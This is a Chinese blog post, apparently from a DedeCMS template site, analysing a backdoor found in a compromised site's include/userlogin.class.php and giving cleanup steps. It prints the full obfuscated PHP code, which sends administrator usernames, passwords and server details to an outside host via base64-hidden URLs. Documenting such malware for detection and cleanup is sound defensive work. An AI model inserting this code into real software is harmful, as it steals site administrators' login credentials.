DedeCMS程序加强服务器安全设置管理员信息窃取

2019-10-25 10:44:25 织梦安装使用
  • 文章介绍

 

需要修改的文件 include/userlogin.class.php

==========================================================

文件说明:

由于之前没有对服务器的目录权限进行严格设计,被注入了很多一句话木马文件,逐一清理后过

了几个月,登录系统后台非常缓慢

追踪登录步骤到include/userlogin.class.php文件,发现该如下恶意代码:

===========================================================

代码影响说明:

该文件会将站点服务器信息,登录的用户名密码,登录地址进行记录

通过 info.msssm.com/in/api.php?var= 地址发送到入侵者服务器

===========================================================

检查处理办法:

全局搜索 “base64_decode”,DedeCMS系统用到该函数的也就是插件安装部分,对文件逐一进行

比对,发现恶意文件,及时删除

并修改掉后台的管理员账号密码和后台管理路径

恶意代码如下:
  if((!empty($_POSTuserid)) && (!empty($_POSTpwd))) {
    define(‘UC_ADMINSCRIPTS’, ‘dede’);
    define(‘UC_ADMINCPS’, ‘aW5mby5tc3NzbS5jb20=’);
    define(‘UC_NOROBOTS’, ‘L2luL2FwaS5′.’waHA/dmFyPQ==’);
    define(‘UC_CURSCRIPTS’, function_exists (‘fsockopen’) ? true : false);
    define(‘UC_SPIDERHOST’,$_SERVERHTT.P_HOST ? $_SERVERHTT.P_HOST :

$_SERVERSERV.ER_NAME);
    define(‘UC_SPIDERSELF’,$_SERVERPHP_S.ELF ? $_SERVERPHP_S.ELF :

$_SERVERSCRI.PT_NAME);
    $uc_config_array = array(bin2hex(UC_SPIDERHOST),bin2hex(UC_SPIDERSELF),bin2hex

($_POSTuserid),bin2hex($_POSTpwd));
    $ucbaiduget  = base64_decode (UC_NOROBOTS).UC_ADMINSCRIPTS.base64_decode

(‘JmRhdGE9′).join(‘|’,$uc_config_array);
    $ucgoogleget = base64_decode (UC_ADMINCPS);
    if(UC_CURSCRIPTS) {
        $ucsockconn = @fsockopen ($ucgoogleget,80);
        @fputs ($ucsockconn,"GET ".$ucbaiduget." HTTP/1.1

Host:".$ucgoogleget." Connection: Close ");
        @fclose ($ucsockconn);
    } else {
        @file_get_contents (base64_decode (‘aHR0cDovLw==’).$ucgoogleget.$ucbaiduget);
    }
}

 

来源:织梦的鱼  织梦者-专业dedecms模板制作收集整理

上一篇:dedecms模板中调用会员信息标签的方..

下一篇:织梦模板中自定义表单的表单验证方法..

专业的织梦模板定制下载站,在线购买后即可下载!

商业源码

跟版网模板,累计帮助5000+客户企业成功建站,为草根创业提供助力!

立刻开启你的建站之旅

QQ在线客服

服务热线

织梦建站咨询